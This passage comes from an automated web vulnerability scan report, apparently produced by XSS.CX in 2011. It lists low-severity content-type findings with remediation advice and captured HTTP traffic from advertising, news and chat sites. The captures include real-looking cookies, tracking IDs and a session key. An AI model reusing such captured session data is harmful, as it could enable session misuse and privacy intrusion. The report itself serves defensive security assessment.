X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; __unam=383b06c-1327947bdf6-95861c2-1; docloc=http://www.thedailygreen.com/; s_cc=true; s_nr=1316294746871; hm_neworold=New; neworold=8; s_lastvisit=1316294746875; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=The%20Daily%20Green%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; __utma=78940241.1037145031.1316294748.1316294748.1316294748.1; __utmb=78940241.1.10.1316294748; __utmc=78940241; __utmz=78940241.1316294748.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=310
Date: Sat, 17 Sep 2011 16:24:37 GMT
Content-Length: 2058
Connection: close

{"statuses_count":4640,"favourites_count":0,"protected":false,"profile_text_color":"634047","profile_image_url":"http:\/\/a2.twimg.com\/profile_images\/1212036708\/HOG-heart-twitter_normal.jpg","name"
...[SNIP]...
26.60. http://www.thedailygreen.com/promo-homepage-110916  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thedailygreen.com
Path:   /promo-homepage-110916

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /promo-homepage-110916 HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/cm/thedailygreen/flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; __unam=383b06c-1327947bdf6-95861c2-1; docloc=http://www.thedailygreen.com/

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=389
Date: Sat, 17 Sep 2011 16:27:16 GMT
Content-Length: 4646
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
    <playerpreferences>
<templatedata>

<backgroundimage>images/background.png</backgroundimage>
<timerIntCount>0</ti
...[SNIP]...
26.61. http://www.tribalfusion.com/test/opt.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tribalfusion.com
Path:   /test/opt.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /test/opt.js HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-store
Content-Type: text/html
Content-Length: 31
Date: Sat, 17 Sep 2011 16:29:22 GMT

var TFID='optout';
OPT_DO();
27. Content type is not specified  previous
There are 6 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://208.111.153.35/open/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://208.111.153.35
Path:   /open/1

Request

POST /open/1 HTTP/1.1
User-Agent: Shockwave Flash
Host: 208.111.153.35
Content-Length: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache

.

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 17
Server: FlashCom/4.0.3
X-RTMPT-Max-Pipelined-Requests: 5

C27mbD82TG1MSx-Z
27.2. http://ad.technoratimedia.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Request

GET /st?pfm=1&tent=ch&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=1&efo=0&atf=1&uatRandNo=55314&ad_type=ad&section=740450&ad_size=300x250&cb=8344492496 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
Referer: http://widgets.uproxx.com/ads/tribal/ur-tech-300.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:36:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 17:36:22 GMT
Pragma: no-cache
Content-Length: 4403
Age: 107
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
27.3. http://pcm1.map.pulsemgr.com/uds/pc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm1.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch
Cookie: c=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Sat, 17 Sep 2011 16:44:03 GMT
Connection: close

GIF89a.............!.......,...........D..;
27.4. http://www.meebo.com/cmd/btproviders  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/btproviders

Request

POST /cmd/btproviders HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26pts_bk%3D1315097366590; meebo-cim-session=26e5cf38356ae41d2e8d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:36:10 GMT
Connection: keep-alive
Content-Length: 432

[{"url": "http://tags.bluekai.com/site/4195?id={{tcookie}}&", "code": "bk", "sslUrl": "https://stags.bluekai.com/site/4195?id={{tcookie}}&", "interval": 2592000000}, {"url": "http://syndication.mmismm
...[SNIP]...
27.5. http://www.meebo.com/cmd/tc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Content-Length: 66
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26pts_bk%3D1315097366590; meebo-cim-session=26e5cf38356ae41d2e8d

canopy=true&tc=true&tcookie=b6f4436ac614b0358d75&partner=seventeen

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:36:14 GMT
Connection: keep-alive
Set-Cookie: rt=; domain=.meebo.com; expires=Sat, 17-Sep-2011 16:36:14 PST; path=/cmd/tc;
Content-Length: 485

{"stat": "ok", "data": {"tcookie": "b6f4436ac614b0358d75", "canopy": {"enabled": false}, "categories": {"ic19": "1", "ic17": "1", "ic16": "1", "ic12": "1", "ama_allowed": "false", "ac7": "1", "ac6": "
...[SNIP]...
27.6. http://www.meebo.com/mcmd/start  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /mcmd/start

Request

GET /mcmd/start?type=none&bcookie=&ts=1316294785169&sessionType=eg HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
Cache-Control: max-age=0
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; meebo-cim-session=26e5cf38356ae41d2e8d; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26ac15%3D1%26ic8%3D1%26ac7%3D1%26ac6%3D1%26ac4%3D1%26ic20%3D1%26ic7%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:36:34 GMT
Connection: keep-alive
Content-Length: 150

{"clientId":0,"servertime":1316277394,"start_time":1316277394,"sessionKey":"000000000000000000000000aa9dff0ac8a3hi66GgKK39dddcebd5e01f633662837616c6"}
Report generated by XSS.CX at Sat Sep 17 17:46:05 CDT 2011.